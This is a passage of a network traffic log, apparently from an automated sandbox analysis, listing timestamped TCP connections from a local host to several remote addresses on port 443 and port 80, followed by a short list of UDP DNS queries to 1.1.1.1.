Apr 18, 2024 01:23:15.606934071 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.650875092 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.650953054 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.651086092 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.654700994 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.654777050 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.654858112 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.655241013 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.655319929 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.655399084 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.656183004 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.656249046 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.656934977 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.657011032 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.657320023 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.657356977 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.659580946 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.659657955 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.659667015 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.659712076 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.659763098 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.659815073 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.660259008 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.660274982 CEST	443	49740	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.660284996 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.660327911 CEST	49740	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.765214920 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:15.808176041 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:15.871180058 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:15.871222973 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:15.871304035 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:15.872009993 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:15.872025967 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:15.872590065 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.872843027 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.872903109 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.874376059 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.874460936 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.875030994 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.875130892 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.875406981 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.875437975 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.876226902 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.876638889 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.876669884 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.880323887 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.880404949 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.880527973 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.881084919 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.881186962 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.881839037 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.881891012 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.882476091 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.882548094 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.883985043 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.884054899 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.887145996 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.887245893 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.887440920 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.918492079 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.932025909 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.932081938 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:15.932188988 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:15.982804060 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.066708088 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.066850901 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.066922903 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.066943884 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.066972971 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067027092 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067058086 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067197084 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067248106 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067275047 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067362070 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067416906 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067430019 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067509890 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067563057 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067574024 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067651987 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067703009 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067713976 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067800999 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067854881 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.067866087 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067945957 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.067997932 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.068008900 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068092108 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068154097 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.068165064 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068285942 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068337917 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.068348885 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068671942 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.068730116 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.070707083 CEST	49736	443	192.168.2.4	104.18.3.35
Apr 18, 2024 01:23:16.070735931 CEST	443	49736	104.18.3.35	192.168.2.4
Apr 18, 2024 01:23:16.081506968 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.081790924 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.081860065 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.082840919 CEST	49746	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.082878113 CEST	443	49746	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.083903074 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.083966970 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.084075928 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.088296890 CEST	49744	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.088325977 CEST	443	49744	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.088754892 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.088949919 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.089060068 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.089139938 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.089200020 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.089240074 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.089309931 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.089309931 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.091866970 CEST	49745	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:16.091896057 CEST	443	49745	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:16.099632978 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.099708080 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.099980116 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.100735903 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.100811005 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.205595970 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.209265947 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.209285021 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.210840940 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.210938931 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.213174105 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.213258982 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.213704109 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.213711023 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.262819052 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.326997995 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.336257935 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.336313963 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.337903976 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.338032007 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.351841927 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.352042913 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.404367924 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.404449940 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:16.406697989 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.406847000 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.406930923 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.407974958 CEST	49747	443	192.168.2.4	13.107.213.40
Apr 18, 2024 01:23:16.407993078 CEST	443	49747	13.107.213.40	192.168.2.4
Apr 18, 2024 01:23:16.447119951 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:16.709781885 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:16.709861040 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:16.709991932 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:16.711838961 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:16.711918116 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:16.936836958 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:16.937067986 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:17.114326954 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.114367962 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.115050077 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.115303040 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.115319014 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.125945091 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:17.126023054 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:17.127100945 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:17.170627117 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:17.332895041 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.376817942 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.917889118 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.917917013 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.919454098 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.921670914 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.921761990 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:17.921976089 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:17.964138985 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.028908968 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.029154062 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.029225111 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.029246092 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.029337883 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.029381990 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.029387951 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.031759977 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.031802893 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.031815052 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.031821966 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.031861067 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.035367012 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.038827896 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.038867950 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.038876057 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.038882971 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.038923979 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.042453051 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.042681932 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.042731047 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.409888029 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.410036087 CEST	49753	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.410062075 CEST	443	49753	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.456118107 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.518624067 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.518774986 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.518830061 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.518830061 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.518908978 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.518954039 CEST	49750	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.518970966 CEST	443	49750	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.562187910 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.562227964 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.562319040 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.562587023 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.562606096 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.782310963 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.782371998 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.783520937 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.783535004 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.783736944 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.784658909 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:18.832187891 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:18.897346973 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.897425890 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:18.897517920 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.898420095 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:18.898500919 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.080516100 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.080564022 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.080627918 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.090209961 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.090228081 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.114773989 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.115539074 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.115597010 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.116321087 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.121793985 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.121951103 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.122484922 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.125937939 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:19.126123905 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:19.126240015 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:19.139260054 CEST	49754	443	192.168.2.4	23.201.212.130
Apr 18, 2024 01:23:19.139278889 CEST	443	49754	23.201.212.130	192.168.2.4
Apr 18, 2024 01:23:19.164202929 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.324927092 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.325160980 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.325253963 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.325331926 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.325357914 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.325387955 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.325413942 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.327663898 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.327872038 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.327933073 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.331465960 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.331680059 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.331738949 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.334929943 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.335120916 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.335180998 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.338289976 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.338521004 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.338612080 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.341602087 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.342314959 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.343748093 CEST	49755	443	192.168.2.4	199.36.158.100
Apr 18, 2024 01:23:19.343786001 CEST	443	49755	199.36.158.100	192.168.2.4
Apr 18, 2024 01:23:19.413122892 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.413604975 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.413638115 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.417242050 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.417337894 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.418337107 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.418512106 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.418541908 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.460119963 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.462516069 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.462523937 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.509397984 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.625787020 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.625962019 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:19.626015902 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.627397060 CEST	49756	443	192.168.2.4	13.107.213.41
Apr 18, 2024 01:23:19.627429008 CEST	443	49756	13.107.213.41	192.168.2.4
Apr 18, 2024 01:23:26.312249899 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:26.312315941 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:26.312508106 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:28.516307116 CEST	49749	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:23:28.516369104 CEST	443	49749	142.250.105.99	192.168.2.4
Apr 18, 2024 01:23:30.792351961 CEST	80	49723	69.164.42.0	192.168.2.4
Apr 18, 2024 01:23:30.792524099 CEST	49723	80	192.168.2.4	69.164.42.0
Apr 18, 2024 01:23:30.792659998 CEST	49723	80	192.168.2.4	69.164.42.0
Apr 18, 2024 01:23:30.896878958 CEST	80	49723	69.164.42.0	192.168.2.4
Apr 18, 2024 01:23:45.645351887 CEST	80	49724	69.164.42.0	192.168.2.4
Apr 18, 2024 01:23:45.645481110 CEST	49724	80	192.168.2.4	69.164.42.0
Apr 18, 2024 01:23:45.645560026 CEST	49724	80	192.168.2.4	69.164.42.0
Apr 18, 2024 01:23:45.750037909 CEST	80	49724	69.164.42.0	192.168.2.4
Apr 18, 2024 01:24:16.269556999 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:16.269644976 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.269933939 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:16.270273924 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:16.270306110 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.485217094 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.485515118 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:16.485546112 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.486017942 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.486669064 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:16.486754894 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:16.540515900 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:26.484200954 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:26.484337091 CEST	443	49764	142.250.105.99	192.168.2.4
Apr 18, 2024 01:24:26.484396935 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:28.202353001 CEST	49764	443	192.168.2.4	142.250.105.99
Apr 18, 2024 01:24:28.202426910 CEST	443	49764	142.250.105.99	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 01:23:11.889575958 CEST	53	50332	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:11.889625072 CEST	53	60890	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:12.602900028 CEST	53	59837	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:14.041028976 CEST	49901	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.041353941 CEST	50249	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.150141001 CEST	53	50249	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:14.151220083 CEST	53	49901	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:14.879818916 CEST	56303	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.879920006 CEST	60055	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.880707026 CEST	62864	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.880829096 CEST	51150	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:14.985307932 CEST	53	62864	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:14.985712051 CEST	53	51150	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:14.989573956 CEST	53	60055	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:15.010682106 CEST	53	56303	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:15.516769886 CEST	62376	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:15.517522097 CEST	57999	53	192.168.2.4	1.1.1.1
Apr 18, 2024 01:23:15.646003008 CEST	53	62376	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:15.649348021 CEST	53	57999	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:15.968413115 CEST	53	55212	1.1.1.1	192.168.2.4
Apr 18, 2024 01:23:15.991686106 CEST	60394	53	192.168.2.4	1.1.1.1
